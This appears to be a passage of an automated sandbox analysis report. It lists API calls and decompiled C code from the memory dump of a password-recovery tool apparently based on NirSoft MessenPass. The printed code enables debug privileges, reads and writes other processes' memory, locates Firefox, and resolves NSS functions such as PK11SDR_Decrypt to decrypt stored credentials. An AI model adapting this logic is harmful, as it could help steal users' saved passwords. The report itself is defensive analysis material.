                                          • WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00404BC1
                                          • CloseHandle.KERNEL32(00000000), ref: 00404BC8
                                          • memset.MSVCRT ref: 00404BE1
                                          • ReadProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404BFE
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00404C15
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 00404C2B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404C43
                                          • FreeLibrary.KERNEL32(?), ref: 00404C51
                                          • VirtualFreeEx.KERNEL32(00000000,0040428D,00000000,00008000), ref: 00404C6A
                                          • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C74
                                          • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C7E
                                          • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C88
                                          • CloseHandle.KERNEL32(00000000), ref: 00404C8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProcVirtual$Handle$FreeProcess$Memory$AllocClose$ModuleWritememset$LibraryReadstrlen$??2@??3@DirectoryObjectOpenResumeSingleSystemThreadVersionWait_mbscpymemcpy
                                          • String ID: GetModuleHandleA$GetProcAddress$LocalFree$WriteProcessMemory$kernel32.dll
                                          • API String ID: 826043887-859290676
                                          • Opcode ID: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
                                          • Instruction ID: 453227f2aabe0250eee1d40a9044243133179be0bc8eed6658bb11275d9bd618
                                          • Opcode Fuzzy Hash: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
                                          • Instruction Fuzzy Hash: CA81F6B1901218BBDF21ABA1CC45EEFBF79EF88754F114066F604A2160D7395A81CFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
                                            • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                          • GetLastError.KERNEL32(00000000), ref: 00410E02
                                          • GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 00410E24
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
                                          • GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 00410E5A
                                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,00000000), ref: 00410E78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesProcessTokenValue
                                          • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
                                          • API String ID: 2949824235-164648368
                                          • Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                          • Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
                                          • Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                          • Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00407898(void** __eax) {
                                          				void* __esi;
                                          				void* _t15;
                                          				int _t16;
                                          				int _t17;
                                          				void* _t26;
                                          				void** _t38;
                                          				void** _t40;
                                          				void* _t45;
                                          
                                          				_t40 = __eax;
                                          				_t15 =  *__eax;
                                          				if(_t15 != 0xffffffff) {
                                          					_t6 =  &(_t40[0x52]); // 0x247
                                          					_t16 = FindNextFileA(_t15, _t6); // executed
                                          					 *(_t45 + 4) = _t16;
                                          					if(_t16 != 0) {
                                          						goto L5;
                                          					} else {
                                          						E00407930(_t40);
                                          						goto L4;
                                          					}
                                          				} else {
                                          					_t1 =  &(_t40[0x52]); // 0x247
                                          					_t2 =  &(_t40[1]); // 0x103
                                          					_t26 = FindFirstFileA(_t2, _t1); // executed
                                          					 *_t40 = _t26;
                                          					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
                                          					L4:
                                          					if( *(_t45 + 4) != 0) {
                                          						L5:
                                          						_t9 =  &(_t40[0xa2]); // 0x387
                                          						_t38 = _t9;
                                          						_t10 =  &(_t40[0x5d]); // 0x273
                                          						_t28 = _t10;
                                          						_t41 =  &(_t40[0xf3]);
                                          						_t17 = strlen( &(_t40[0xf3]));
                                          						if(strlen(_t10) + _t17 + 1 >= 0x143) {
                                          							 *_t38 = 0;
                                          						} else {
                                          							E00406B4B(_t38, _t41, _t28);
                                          						}
                                          					}
                                          				}
                                          				return  *(_t45 + 4);
                                          			}

                                          APIs
                                          • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                          • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                          • strlen.MSVCRT ref: 004078FC
                                          • strlen.MSVCRT ref: 00407904
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileFindstrlen$FirstNext
                                          • String ID:
                                          • API String ID: 379999529-0
                                          • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                          • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                          • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                          • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                          • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                          • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                          • LockResource.KERNEL32(00000000), ref: 004120C4
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                          • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                          • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                          • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E0040C66A(void* __ecx, void* __eflags) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t56;
                                          				struct HINSTANCE__* _t59;
                                          				void* _t61;
                                          				void* _t65;
                                          				void* _t67;
                                          				void* _t73;
                                          				void* _t83;
                                          				void* _t86;
                                          				void* _t88;
                                          				intOrPtr _t89;
                                          				void* _t91;
                                          				void* _t96;
                                          				void* _t97;
                                          				void* _t111;
                                          				struct HWND__* _t112;
                                          				intOrPtr* _t123;
                                          				void* _t124;
                                          				void* _t126;
                                          
                                          				_t124 = _t126 - 0x68;
                                          				 *0x41dbd4 =  *(_t124 + 0x70);
                                          				_t56 = E00404D7A(__ecx);
                                          				if(_t56 != 0) {
                                          					0x412192(_t111);
                                          					_t112 = 0;
                                          					 *(_t124 + 0x70) = 0;
                                          					0x410de1(); // executed
                                          					__eflags =  *(_t124 + 0x70);
                                          					if( *(_t124 + 0x70) != 0) {
                                          						FreeLibrary( *(_t124 + 0x70));
                                          					}
                                          					 *0x41e150 = 0x11223344; // executed
                                          					EnumResourceTypesA( *0x41dbd4, 0x412111, _t112); // executed
                                          					_t59 =  *0x41e150;
                                          					__eflags = _t59 - 0xe17b5ca0;
                                          					 *(_t124 + 0x70) = _t59;
                                          					if(_t59 == 0xe17b5ca0) {
                                          						_t61 = E0040731C(_t124 + 0x34);
                                          						 *((intOrPtr*)(_t124 + 0x5c)) = 0x20;
                                          						 *(_t124 + 0x54) = _t112;
                                          						 *(_t124 + 0x60) = _t112;
                                          						 *(_t124 + 0x58) = _t112;
                                          						 *(_t124 + 0x64) = _t112;
                                          						E0040C427(_t61, _t124 - 0x384);
                                          						 *((intOrPtr*)(_t124 + 0x14)) = _t124 + 0x34;
                                          						E0040763D(__eflags, _t124 + 0x34,  *((intOrPtr*)(_t124 + 0x78)));
                                          						_t65 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/savelangfile", 0xffffffff);
                                          						__eflags = _t65;
                                          						if(_t65 < 0) {
                                          							E0040902B(); // executed
                                          							_t67 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/deleteregkey", 0xffffffff);
                                          							__eflags = _t67;
                                          							if(_t67 < 0) {
                                          								__eflags =  *(_t124 + 0x70) + 0x1e84a361 - 1;
                                          								if( *(_t124 + 0x70) + 0x1e84a361 != 1) {
                                          									L28:
                                          									 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
                                          									0x413d56( *((intOrPtr*)(_t124 + 8)));
                                          									__eflags =  *(_t124 + 4) - _t112;
                                          									if( *(_t124 + 4) != _t112) {
                                          										DeleteObject( *(_t124 + 4));
                                          										 *(_t124 + 4) = _t112;
                                          									}
                                          									L30:
                                          									 *((intOrPtr*)(_t124 - 0x384)) = 0x417d40;
                                          									E0040733E(_t124 + 0x34);
                                          									E00407A7A(_t124 + 0x54);
                                          									E0040733E(_t124 + 0x34);
                                          									L31:
                                          									_t73 = 0;
                                          									__eflags = 0;
                                          									goto L32;
                                          								}
                                          								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + 0x30)) - 1;
                                          								if(__eflags <= 0) {
                                          									L16:
                                          									 *0x415394(_t112);
                                          									E0040C3AF(_t124 - 0x384);
                                          									__eflags =  *((intOrPtr*)(_t124 - 0x238)) - 3;
                                          									if( *((intOrPtr*)(_t124 - 0x238)) != 3) {
                                          										_push(5);
                                          									} else {
                                          										_push(3);
                                          									}
                                          									ShowWindow( *(_t124 - 0x27c), ??);
                                          									UpdateWindow( *(_t124 - 0x27c));
                                          									 *((intOrPtr*)(_t124 - 0x264)) = LoadAcceleratorsA( *0x41dbd4, 0x67);
                                          									PostMessageA( *(_t124 - 0x27c), 0x415, _t112, _t112);
                                          									_t83 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
                                          									__eflags = _t83;
                                          									if(_t83 == 0) {
                                          										L27:
                                          										 *0x415398();
                                          										goto L28;
                                          									} else {
                                          										_t123 =  *0x415184;
                                          										do {
                                          											_t86 =  *0x415208( *(_t124 - 0x27c),  *((intOrPtr*)(_t124 - 0x264)), _t124 + 0x18);
                                          											__eflags = _t86;
                                          											if(_t86 != 0) {
                                          												goto L26;
                                          											}
                                          											_t89 =  *0x41e1f4;
                                          											__eflags = _t89 - _t112;
                                          											if(_t89 == _t112) {
                                          												L24:
                                          												_t91 =  *_t123( *(_t124 - 0x27c), _t124 + 0x18);
                                          												__eflags = _t91;
                                          												if(_t91 == 0) {
                                          													TranslateMessage(_t124 + 0x18);
                                          													DispatchMessageA(_t124 + 0x18);
                                          												}
                                          												goto L26;
                                          											}
                                          											_t96 =  *_t123(_t89, _t124 + 0x18);
                                          											__eflags = _t96;
                                          											if(_t96 != 0) {
                                          												goto L26;
                                          											}
                                          											goto L24;
                                          											L26:
                                          											_t88 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
                                          											__eflags = _t88;
                                          										} while (_t88 != 0);
                                          										goto L27;
                                          									}
                                          								}
                                          								_t97 = E0040C5A4(_t124 - 0x384, __eflags);
                                          								__eflags = _t97;
                                          								if(_t97 == 0) {
                                          									_t112 = 0;
                                          									__eflags = 0;
                                          									goto L16;
                                          								}
                                          								 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
                                          								0x413d56( *((intOrPtr*)(_t124 + 8)));
                                          								__eflags =  *(_t124 + 4);
                                          								if( *(_t124 + 4) != 0) {
                                          									DeleteObject( *(_t124 + 4));
                                          									 *(_t124 + 4) =  *(_t124 + 4) & 0x00000000;
                                          								}
                                          								goto L30;
                                          							}
                                          							RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
                                          							goto L28;
                                          						}
                                          						 *0x41e390 = 0x41db18;
                                          						E00409167();
                                          						goto L28;
                                          					}
                                          					MessageBoxA(_t112, "Failed to load the executable file !", "Error", 0x30);
                                          					goto L31;
                                          				} else {
                                          					_t73 = _t56 + 1;
                                          					L32:
                                          					return _t73;
                                          				}
                                          			}

























                                          APIs
                                            • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                            • Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                            • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                            • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                          • FreeLibrary.KERNEL32(?), ref: 0040C6A7
                                          • EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
                                          • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
                                          • String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
                                          • API String ID: 1343656639-3807849023
                                          • Opcode ID: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
                                          • Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
                                          • Opcode Fuzzy Hash: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
                                          • Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00405EC5(CHAR* _a4) {
                                          				void* _v8;
                                          				int _v12;
                                          				void _v267;
                                          				char _v268;
                                          				void _v531;
                                          				char _v532;
                                          				void _v787;
                                          				char _v788;
                                          				void _v1051;
                                          				char _v1052;
                                          				void _v2075;
                                          				char _v2076;
                                          				void** _t44;
                                          				void* _t49;
                                          				void* _t51;
                                          				char* _t54;
                                          				char* _t55;
                                          				char* _t63;
                                          				char* _t67;
                                          				CHAR* _t79;
                                          				void* _t82;
                                          				void* _t83;
                                          				void* _t84;
                                          				void* _t85;
                                          
                                          				_v1052 = 0;
                                          				memset( &_v1051, 0, 0x104);
                                          				_v788 = 0;
                                          				memset( &_v787, 0, 0xff);
                                          				_t79 = _a4;
                                          				_t44 =  &_v8;
                                          				 *_t79 = 0;
                                          				0x411d68(0x80000002, "SOFTWARE\Mozilla", _t44);
                                          				_t83 = _t82 + 0x24;
                                          				if(_t44 != 0) {
                                          					L13:
                                          					0x413d0c(_t79,  &_v1052);
                                          					if( *_t79 == 0) {
                                          						ExpandEnvironmentStringsA("%programfiles%\Mozilla Firefox", _t79, 0x104);
                                          						_t49 = E00405E4A(_t79); // executed
                                          						if(_t49 == 0) {
                                          							 *_t79 = 0;
                                          						}
                                          						if( *_t79 == 0) {
                                          							GetCurrentDirectoryA(0x104, _t79);
                                          							_t51 = E00405E4A(_t79); // executed
                                          							if(_t51 == 0) {
                                          								 *_t79 = 0;
                                          							}
                                          						}
                                          					}
                                          					return 0 |  *_t79 != 0x00000000;
                                          				} else {
                                          					_v268 = 0;
                                          					memset( &_v267, 0, 0xff);
                                          					_t54 =  &_v268;
                                          					_v12 = 0;
                                          					0x411dee(_v8, 0, _t54);
                                          					_t84 = _t83 + 0x18;
                                          					while(_t54 == 0) {
                                          						_t55 =  &_v268;
                                          						0x413daa(_t55, "mozilla", 7);
                                          						_t85 = _t84 + 0xc;
                                          						if(_t55 != 0) {
                                          							L10:
                                          							_v12 = _v12 + 1;
                                          							_t54 =  &_v268;
                                          							0x411dee(_v8, _v12, _t54);
                                          							_t84 = _t85 + 0xc;
                                          							continue;
                                          						}
                                          						_v532 = 0;
                                          						memset( &_v531, 0, 0x104);
                                          						_v2076 = 0;
                                          						memset( &_v2075, 0, 0x3ff);
                                          						0x413d9e( &_v2076, 0x3ff, "%s\bin",  &_v268);
                                          						0x411dae(_v8,  &_v2076, "PathToExe", 0x104);
                                          						_t63 =  &_v532;
                                          						0x413da4(_t63, 0x5c);
                                          						_t85 = _t85 + 0x40;
                                          						if(_t63 != 0) {
                                          							 *_t63 = 0;
                                          						}
                                          						if(_v532 != 0 && E00405E4A( &_v532) != 0) {
                                          							_t67 =  &_v268;
                                          							0x413d74(_t67,  &_v788);
                                          							if(_t67 > 0) {
                                          								0x413d0c( &_v1052,  &_v532);
                                          								0x413d0c( &_v788,  &_v268);
                                          								_t85 = _t85 + 0x10;
                                          							}
                                          						}
                                          						_t79 = _a4;
                                          						goto L10;
                                          					}
                                          					RegCloseKey(_v8);
                                          					goto L13;
                                          				}
                                          			}




























                                          APIs
                                          • memset.MSVCRT ref: 00405EE7
                                          • memset.MSVCRT ref: 00405EFF
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00405F3A
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • _mbsnbicmp.MSVCRT ref: 00405F68
                                          • memset.MSVCRT ref: 00405F87
                                          • memset.MSVCRT ref: 00405FA0
                                          • _snprintf.MSVCRT ref: 00405FB9
                                          • _mbsrchr.MSVCRT ref: 00405FDE
                                          • _mbsicmp.MSVCRT ref: 00406012
                                          • _mbscpy.MSVCRT ref: 0040602B
                                          • _mbscpy.MSVCRT ref: 0040603E
                                          • RegCloseKey.ADVAPI32(?), ref: 0040606C
                                          • _mbscpy.MSVCRT ref: 0040607A
                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                          • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                          • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                          • API String ID: 201549630-2797892316
                                          • Opcode ID: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                          • Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
                                          • Opcode Fuzzy Hash: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                          • Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00410C6D
                                            • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                            • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                            • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                            • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                            • Part of subcall function 00405EC5: _mbscpy.MSVCRT ref: 0040607A
                                            • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                            • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                          • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                          • SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                          • memset.MSVCRT ref: 00410CB4
                                          • strlen.MSVCRT ref: 00410CBE
                                          • strlen.MSVCRT ref: 00410CCC
                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                          • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                          • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                          • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                          • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                          • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                          • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                          • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                          • API String ID: 2719586705-3659000792
                                          • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                          • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                          • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                          • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00407C79(signed int _a4) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				char _v8;
                                          				char _v9;
                                          				char _v10;
                                          				char _v11;
                                          				char _v12;
                                          				char _v13;
                                          				char _v14;
                                          				char _v15;
                                          				char _v16;
                                          				char _v17;
                                          				char _v18;
                                          				char _v19;
                                          				void _v20;
                                          				long _v24;
                                          				int _v28;
                                          				int _v32;
                                          				void* _v36;
                                          				void _v291;
                                          				char _v292;
                                          				void _v547;
                                          				char _v548;
                                          				void _v1058;
                                          				short _v1060;
                                          				void _v1570;
                                          				short _v1572;
                                          				int _t88;
                                          				signed int _t91;
                                          				signed int _t92;
                                          				signed int _t94;
                                          				signed int _t96;
                                          				signed int _t99;
                                          				signed int _t104;
                                          				signed short* _t110;
                                          				void* _t113;
                                          				void* _t114;
                                          
                                          				_t92 = 0;
                                          				_v20 = 0xa3;
                                          				_v19 = 0x1e;
                                          				_v18 = 0xf3;
                                          				_v17 = 0x69;
                                          				_v16 = 7;
                                          				_v15 = 0x62;
                                          				_v14 = 0xd9;
                                          				_v13 = 0x1f;
                                          				_v12 = 0x1e;
                                          				_v11 = 0xe9;
                                          				_v10 = 0x35;
                                          				_v9 = 0x7d;
                                          				_v8 = 0x4f;
                                          				_v7 = 0xd2;
                                          				_v6 = 0x7d;
                                          				_v5 = 0x48;
                                          				_v292 = 0;
                                          				memset( &_v291, 0, 0xff);
                                          				_v548 = 0;
                                          				memset( &_v547, 0, 0xff);
                                          				_v1572 = 0;
                                          				memset( &_v1570, 0, 0x1fe);
                                          				_v1060 = 0;
                                          				memset( &_v1058, 0, 0x1fe);
                                          				_v36 = _a4 + 4;
                                          				_a4 = 0;
                                          				_v24 = 0xff;
                                          				GetComputerNameA( &_v292,  &_v24);
                                          				_v24 = 0xff;
                                          				GetUserNameA( &_v548,  &_v24); // executed
                                          				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                          				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                          				_v32 = strlen( &_v292);
                                          				_t88 = strlen( &_v548);
                                          				_t113 = _v36;
                                          				_v28 = _t88;
                                          				memcpy(_t113,  &_v20, 0x10);
                                          				_t91 = 0xba0da71d;
                                          				if(_v28 > 0) {
                                          					_t110 =  &_v1060;
                                          					do {
                                          						_t104 = _a4 & 0x80000003;
                                          						if(_t104 < 0) {
                                          							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                          						}
                                          						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                          						_t91 = _t91 * 0xbc8f;
                                          						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                          						_a4 = _a4 + 1;
                                          						_t110 =  &(_t110[1]);
                                          					} while (_a4 < _v28);
                                          				}
                                          				if(_v32 > _t92) {
                                          					do {
                                          						_t99 = _a4 & 0x80000003;
                                          						if(_t99 < 0) {
                                          							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                          						}
                                          						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                          						_t91 = _t91 * 0xbc8f;
                                          						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                          						_a4 = _a4 + 1;
                                          						_t92 = _t92 + 1;
                                          					} while (_t92 < _v32);
                                          				}
                                          				return _t91;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 00407CDB
                                          • memset.MSVCRT ref: 00407CEF
                                          • memset.MSVCRT ref: 00407D09
                                          • memset.MSVCRT ref: 00407D1E
                                          • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                          • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                          • strlen.MSVCRT ref: 00407D91
                                          • strlen.MSVCRT ref: 00407DA0
                                          • memcpy.MSVCRT ref: 00407DB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                          • String ID: 5$H$O$b$i$}$}
                                          • API String ID: 1832431107-3760989150
                                          • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                          • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                          • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                          • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNELBASE(psapi.dll,?,00411155,00404495,00000000,00000000,00000000), ref: 004110C2
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 004110DB
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004110EC
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 004110FD
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041110E
                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041111F
                                          • FreeLibrary.KERNEL32(00000000), ref: 0041113F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                          • API String ID: 2449869053-232097475
                                          • Opcode ID: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                          • Instruction ID: 150d9d7abe9eb73bde655d9ea944b9d4c8ac0ad9fe74c99b0592c1ab8213f4a8
                                          • Opcode Fuzzy Hash: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                          • Instruction Fuzzy Hash: CA01B138941212FAC7209F26AD04BE77EE4578CB94F14803BEA04D1669EB7884828A6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E004064FB(void* __eax, intOrPtr _a4, char* _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				void _v275;
